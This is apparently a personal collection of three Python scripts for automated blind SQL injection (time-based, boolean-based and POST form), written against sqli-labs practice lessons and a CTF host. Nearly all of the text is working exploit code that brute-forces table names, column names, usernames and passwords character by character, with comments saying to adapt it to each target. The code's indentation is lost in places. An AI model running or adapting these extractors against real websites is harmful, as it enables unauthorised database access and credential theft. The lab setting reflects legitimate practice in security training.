时间盲注
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 1 22:58:49 2022
@author: small_star
"""
import requests
import time
def get_tables():
table = 'select table_name from information_schema.tables where table_schema=database()'
tables = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
payload = url+" and ascii(substr(({0} limit {1},1),{2},1)) = {3} and sleep(2) %23".format(table,i,j,k)
#print(payload)
start_time = time.time()
res = requests.get(url=payload)
if time.time() - start_time > 2:
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
tables.append(chr_str)
print(tables)
for itm in tables:
#get_column(itm)
return itm
def get_column():
column = 'select column_name from information_schema.columns where table_schema=database() and table_name="users" ' #% (table)'
columns = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3} and sleep(2) %23".format(column,i,j,k)
#print(payload)
start_time = time.time()
res = requests.get(url=payload)
if time.time() - start_time > 2:
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
columns.append(chr_str)
print(columns)
for itm in columns:
#get_column(itm)
return itm
def get_data():
data = "select username from users"
# data = "select password from users"
# data = "select password from users where username='flag' "
datas = []
for i in range(5):
chr_str = ''
for j in range(1,15):
for k in range(33,127):
payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3} and sleep(2) %23".format(data,i,j,k)
#print(payload)
start_time = time.time()
res = requests.get(url=payload)
if time.time() - start_time > 2:
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
datas.append(chr_str)
print(datas)
if __name__ == '__main__':
url = "http://localhost:8082/sqli/sqlilabs/less-8/?id=1'"
# table = get_tables()
# column = get_column()
get_data()
布尔盲注
import requests
def get_tables():
table = 'select table_name from information_schema.tables where table_schema=database()'
tables = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
payload = url+" and ascii(substr(({0} limit {1},1),{2},1))={3}%23".format(table,i,j,k)
#print(payload)
res = requests.get(url=payload)
if 'You are in' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
tables.append(chr_str)
print(tables)
for itm in tables:
#get_column(itm)
return itm
def get_column():
column = 'select column_name from information_schema.columns where table_schema=database() and table_name="users" ' #table_name根据情况改
columns = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3}%23".format(column,i,j,k)
#print(payload)
res = requests.get(url=payload)
if 'You are in' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
columns.append(chr_str)
print(columns)
for itm in columns:
#get_column(itm)
return itm
def get_data():
# data = "select userneame from users"
# data = "select password from users"
data = "select password from users where username='flag' " #sql语句根据需求改
datas = []
for i in range(20):
chr_str = ''
for j in range(1,15):
for k in range(33,127):
payload = url+ " and ascii(substr(({0} limit {1},1),{2},1))={3}%23".format(data,i,j,k)
#print(payload)
res = requests.get(url=payload)
if 'You are in' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
datas.append(chr_str)
print(datas)
if __name__ == '__main__':
url = "http://localhost:8082/sqli/sqlilabs/less-8/?id=1'"
table = get_tables()
column = get_column()
get_data()
POST传参
import requests
def get_schema():
schema = 'select schema_name from information_schema.schemata'
schemas = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(schema,i,j,k),"passwd":"","submit":"Submit"}
#print(payload)
res = requests.post(url,data=data)
if 'flag.jpg' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
schemas.append(chr_str)
print(schemas)
for itm in schemas:
#get_column(itm)
return itm
def get_tables():
table = 'select table_name from information_schema.tables where table_schema=database()'
tables = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
# data = {"uname":"1' or {}=0#".format(i),"passwd":"","submit":"Submit"}
data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(table,i,j,k),"passwd":"","submit":"Submit"}
res = requests.post(url,data=data)
# print(res.text)
if 'flag.jpg' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
tables.append(chr_str)
print(tables)
for itm in tables:
#get_column(itm)
return itm
def get_column():
column = 'select column_name from information_schema.columns where table_schema=database() and table_name="users" ' #table_name根据情况改
columns = []
for i in range(5):
chr_str = ''
for j in range(1,9):
for k in range(33,127):
data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(column,i,j,k),"passwd":"","submit":"Submit"}
# print(payload)
res = requests.post(url,data=data)
if 'flag.jpg' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
columns.append(chr_str)
print(columns)
for itm in columns:
#get_column(itm)
return itm
def get_data():
# data = "select userneame from users"
# data = "select password from users"
shuju = "select password from users " #sql语句根据需求改 where username=''
shujus = []
for i in range(20):
chr_str = ''
for j in range(1,15):
for k in range(33,127):
data = {"uname":"1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(shuju,i,j,k),"passwd":"","submit":"Submit"}
#print(payload)
res = requests.post(url,data=data)
if 'flag.jpg' in res.text: #you are in根据情况改
chr_str+=chr(k)
print(chr_str)
else:
pass
if chr_str=='':
break
else:
shujus.append(chr_str)
print(shujus)
def get():
data = {"uname":"1' or 1=1#","passwd":"","submit":"Submit"}
# print(payload)
res = requests.post(url,data=data)
print(res.text)
if 'flag.jpg' in res.text: #you are in根据情况改
print(1213213)
else:
pass
if __name__ == '__main__':
url = "http://fd5205d2.lxctf.net/Less-15/"
# schema = get_schema()
# get()
# table = get_tables()
# column = get_column()
get_data()